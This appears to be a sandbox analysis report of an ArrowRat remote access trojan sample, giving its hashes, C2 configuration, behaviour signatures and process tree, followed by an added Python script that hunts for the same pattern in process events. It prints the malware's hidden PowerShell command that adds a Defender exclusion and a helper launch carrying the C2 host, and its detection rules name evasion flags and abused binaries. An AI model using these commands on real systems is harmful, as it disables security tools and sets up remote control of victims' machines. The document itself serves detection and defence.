Analysis

  • max time kernel
    1799s
  • max time network
    1802s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    26-02-2023 11:19

General

  • Target

    Client.exe

  • Size

    157KB

  • MD5

    881c51282ebd1bcef1362dd4cd00aec3

  • SHA1

    6f701e0d16191e2a120bf24f873f74a167be5748

  • SHA256

    220f466224194d58d64f18ef376a0c4a7de07c93527070d7b357a708fb4293bf

  • SHA512

    57ff91504021d42079f4ffe0dbd6e185105e5c8a6bba11e20b864720f04243604d48b383ef5d93978ad7fe48e24e876305a374a994c7c5c6ab3303e4c0d97a7e

  • SSDEEP

    3072:+bR3+0O5VbFHexuiCrK0ovzNC0Fie+5cVjvn+sZCh8/QbNb68Y:+bRu0OLoxuiCNovpke+cvnOaQI8

Malware Config

Extracted

Family

arrowrat

Botnet

Client

C2

194.ip.ply.gg:54552

Mutex

AbZfjNVtY

Signatures

  • ArrowRat
    Remote access tool with various capabilities, first seen in late 2021.
  • Modifies WinLogon for persistence (2 TTPs, 1 IoC)
  • Modifies Installed Components in the registry (2 TTPs, 1 IoC)
  • Checks computer location settings (2 TTPs, 1 IoC)
    Looks up the country code configured in the registry, likely a geofence check.
  • Enumerates connected drives (3 TTPs, 1 IoC)
    Attempts to read the root path of hard drives other than the default C: drive.
  • Suspicious use of SetThreadContext (1 IoC)
  • Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s). The sandbox describes this as likely ransomware behaviour, but in this run the signature is not attributed to any process in the tree below and the sample is classed as a RAT, so on its own it is weak evidence.
  • Checks SCSI registry key(s) (3 TTPs, 22 IoCs)
    SCSI information is often read in order to detect sandboxing environments. Here the reads come from the explorer.exe instance that Client.exe spawned (PID 3620), where drive enumeration is also ordinary shell activity; the unexpected parent is the stronger signal.
  • Modifies registry class (39 IoCs)
  • Suspicious behavior: EnumeratesProcesses (4 IoCs)
  • Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (48 IoCs)
  • Suspicious use of FindShellTrayWindow (49 IoCs)
  • Suspicious use of SendNotifyMessage (21 IoCs)
  • Suspicious use of SetWindowsHookEx (3 IoCs)
  • Suspicious use of WriteProcessMemory (14 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Client.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4052
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      2⤵
      • Modifies Installed Components in the registry
      • Enumerates connected drives
      • Checks SCSI registry key(s)
      • Modifies registry class
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:3620
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 194.ip.ply.gg 54552 AbZfjNVtY
      2⤵
      PID:1304
    • C:\Windows\System32\ComputerDefaults.exe
      "C:\Windows\System32\ComputerDefaults.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3972
      • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
        "PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\xjLsSeVeH\Client'
        3⤵
        PID:984
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:3812
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:916
  • C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:984
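Read together with the Malware Config section, the tree above is the pattern a hunter can key on: Client.exe (flagged for SetThreadContext and WriteProcessMemory) launches the signed .NET helper cvtres.exe with the RAT configuration as plain positional arguments (botnet id, C2 host, C2 port, mutex, matching the extracted config exactly), and separately launches ComputerDefaults.exe, an auto-elevating Windows binary, which in turn spawns a hidden PowerShell that adds a Defender exclusion for the RAT's install directory. The Python below is an added example, not part of the sandbox report or of any ArrowRat tooling; it runs the corresponding detections over process-creation events with Sysmon-style field names. The events are constructed from the command lines in this report plus two benign look-alikes; the parent of Client.exe, the helper and auto-elevate binary names beyond cvtres.exe and ComputerDefaults.exe, and the reading of the four positional arguments as ArrowRat's general config order are assumptions.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

@dataclass
class Event:  # one process-creation record, Sysmon Event ID 1 field names
    pid: int
    image: str         # full path of the new process
    parent_image: str  # full path of its parent
    cmdline: str       # command line as logged

@dataclass
class Finding:
    pid: int
    rule: str
    detail: dict

# Signed .NET Framework helpers that interactive software never runs directly; cvtres.exe is
# the one hollowed in this report, the other names are an assumed extension.
DOTNET_HELPERS = {"cvtres.exe", "regasm.exe", "regsvcs.exe", "installutil.exe"}
BUILD_PARENTS = {"csc.exe", "vbc.exe", "msbuild.exe", "devenv.exe", "link.exe"}  # their legitimate parents
# Auto-elevating Windows binaries; ComputerDefaults.exe is from this report, the rest are assumed.
AUTO_ELEVATE = {"computerdefaults.exe", "fodhelper.exe", "sdclt.exe", "eventvwr.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
SYSTEM_DIR = re.compile(r"^[A-Z]:\\Windows\\", re.I)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData)\\", re.I)
EXCLUSION_RE = re.compile(
    r"Add-MpPreference\b.*?-Exclusion(Path|Process|Extension|IpAddress)\s+['\"]?([^'\"\s]+)", re.I)
EVASION_FLAGS = re.compile(r"-(ExecutionPolicy\s+Bypass|WindowStyle\s+Hidden|NoProfile|EncodedCommand)", re.I)
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')  # Windows-style split: a double-quoted run is one token

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def split_cmdline(cmdline: str) -> list[str]:
    return [quoted or bare for quoted, bare in TOKEN_RE.findall(cmdline)]

def check_dotnet_helper(ev: Event) -> Finding | None:
    # A .NET helper whose parent is not a build tool is being used as a host process.
    if basename(ev.image) not in DOTNET_HELPERS or basename(ev.parent_image) in BUILD_PARENTS:
        return None
    args = split_cmdline(ev.cmdline)[1:]
    positional = [a for a in args if not a.startswith("/")]
    detail = {"parent": ev.parent_image, "args": args}
    # ArrowRat passes its config as four positional arguments, in the order seen in this
    # report's command line (assumed to hold generally): botnet id, C2 host, C2 port, mutex.
    if len(positional) == 4 and positional[2].isdigit():
        detail["config"] = {"botnet": positional[0], "c2_host": positional[1],
                            "c2_port": int(positional[2]), "mutex": positional[3]}
    return Finding(ev.pid, "dotnet_helper_unexpected_parent", detail)

def check_defender_exclusion(ev: Event) -> Finding | None:
    # PowerShell adding a Defender exclusion; the usual evasion switches are recorded as well.
    if basename(ev.image) not in {"powershell.exe", "pwsh.exe"}:
        return None
    if (m := EXCLUSION_RE.search(ev.cmdline)) is None:
        return None
    flags = ["-" + f for f in EVASION_FLAGS.findall(ev.cmdline)]
    return Finding(ev.pid, "defender_exclusion_added",
                   {"kind": m.group(1), "value": m.group(2), "parent": ev.parent_image, "flags": flags})

def check_auto_elevate_spawn(ev: Event) -> Finding | None:
    # An auto-elevating binary should never be the parent of a script host.
    if basename(ev.parent_image) in AUTO_ELEVATE and basename(ev.image) in SCRIPT_HOSTS:
        return Finding(ev.pid, "auto_elevate_binary_spawned_script_host", {"parent": ev.parent_image})
    return None

def check_system_binary_parent(ev: Event) -> Finding | None:
    # A Windows-directory binary launched by something living in a user-writable path.
    if SYSTEM_DIR.match(ev.image) and USER_WRITABLE.search(ev.parent_image):
        return Finding(ev.pid, "system_binary_spawned_from_user_dir", {"parent": ev.parent_image})
    return None

CHECKS = (check_dotnet_helper, check_defender_exclusion, check_auto_elevate_spawn, check_system_binary_parent)

def hunt(events: list[Event]) -> list[Finding]:
    return [f for ev in events for check in CHECKS if (f := check(ev)) is not None]

# Constructed sample: part of the report's tree (the parent of Client.exe is assumed to be
# explorer.exe) plus two benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    Event(4052, r"C:\Users\Admin\AppData\Local\Temp\Client.exe", r"C:\Windows\explorer.exe",
          r'"C:\Users\Admin\AppData\Local\Temp\Client.exe"'),
    Event(1304, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe", r"C:\Users\Admin\AppData\Local\Temp\Client.exe",
          r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 194.ip.ply.gg 54552 AbZfjNVtY'),
    Event(3972, r"C:\Windows\System32\ComputerDefaults.exe", r"C:\Users\Admin\AppData\Local\Temp\Client.exe",
          r'"C:\Windows\System32\ComputerDefaults.exe"'),
    Event(984, r"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe", r"C:\Windows\System32\ComputerDefaults.exe",
          r'"PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command '
          r"Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\xjLsSeVeH\Client'"),
    Event(5100, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe", r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
          r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" /NOLOGO /READONLY "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1A2B.tmp"'),
    Event(5200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
          r'"powershell.exe" -NoProfile -Command Get-MpPreference'),
]
```

The cvtres.exe rule keys on the parent rather than on the arguments on purpose: a compile-time cvtres.exe launched by csc.exe also carries positional arguments, so the parent is the discriminator, and the argument parse is only used to pull out the C2 host, port and mutex once the parent is already wrong. On real telemetry, map Image, ParentImage, CommandLine and ProcessId from Sysmon Event ID 1 (or the equivalent EDR fields) into Event and pass the list to hunt().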

Downloads

  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133218875731878852.txt
    Filesize
    75KB
    MD5
    e3417e64fd17fa01c90cf956829ca7ff
    SHA1
    f8960ede60ed71f3ca9f505556390518621393f6
    SHA256
    a55bc5d91308f7bb7cef9268f6333172653c4119c8641abcb0692116fecd860c
    SHA512
    3126805740cdea1d97c1887c0e0e33094b5e187d218f0b8b26c5305ed6aa1737d88a9434e3cfcec9bf1009c9a4fe53e441312e8c24171e08fad2eed0d08cf4a9
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qit5qncw.stp.ps1
    Filesize
    60B
    MD5
    d17fe0a3f47be24a6453e9ef58c94641
    SHA1
    6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256
    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512
    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
  • C:\Users\Admin\AppData\Roaming\temp0923
    Filesize
    10B
    MD5
    8981e4e4262b51696e68126e827966d6
    SHA1
    5220599dbcc127c57ef1646b45bf539a793c48e5
    SHA256
    3dbd2725bb191caefdc0a65a476cb15d75df95c8772149eb13d60b808b0707c6
    SHA512
    a493e970645f66b5cace7de4034d4f28908ab53f15a7b37f7d518c66a5fe7acf1ddfb48ca3a86325b3609e4154c8377f049d45f4a4a8d8cad54733ba8025b0d6
  • memory/916-175-0x00000189CF1D0000-0x00000189CF1F0000-memory.dmp
    Filesize
    128KB
  • memory/916-177-0x00000189CF5E0000-0x00000189CF600000-memory.dmp
    Filesize
    128KB
  • memory/916-172-0x00000189CF210000-0x00000189CF230000-memory.dmp
    Filesize
    128KB
  • memory/984-153-0x000001C5FB7E0000-0x000001C5FB7F0000-memory.dmp
    Filesize
    64KB
  • memory/984-142-0x000001C5FA030000-0x000001C5FA052000-memory.dmp
    Filesize
    136KB
  • memory/984-154-0x000001C5FB7E0000-0x000001C5FB7F0000-memory.dmp
    Filesize
    64KB
  • memory/1304-158-0x0000000006520000-0x0000000006570000-memory.dmp
    Filesize
    320KB
  • memory/1304-155-0x0000000005C60000-0x0000000005CC6000-memory.dmp
    Filesize
    408KB
  • memory/1304-151-0x00000000054D0000-0x00000000054E0000-memory.dmp
    Filesize
    64KB
  • memory/1304-150-0x0000000005CE0000-0x0000000006284000-memory.dmp
    Filesize
    5.6MB
  • memory/1304-137-0x0000000005580000-0x000000000561C000-memory.dmp
    Filesize
    624KB
  • memory/1304-136-0x00000000054E0000-0x0000000005572000-memory.dmp
    Filesize
    584KB
  • memory/1304-315-0x00000000054D0000-0x00000000054E0000-memory.dmp
    Filesize
    64KB
  • memory/1304-134-0x0000000000400000-0x0000000000418000-memory.dmp
    Filesize
    96KB
  • memory/3620-166-0x0000000002FE0000-0x0000000002FE1000-memory.dmp
    Filesize
    4KB
  • memory/4052-152-0x0000000000E80000-0x0000000000E90000-memory.dmp
    Filesize
    64KB
  • memory/4052-133-0x00000000005D0000-0x00000000005FC000-memory.dmp
    Filesize
    176KB
  • memory/4052-316-0x0000000000E80000-0x0000000000E90000-memory.dmp
    Filesize
    64KB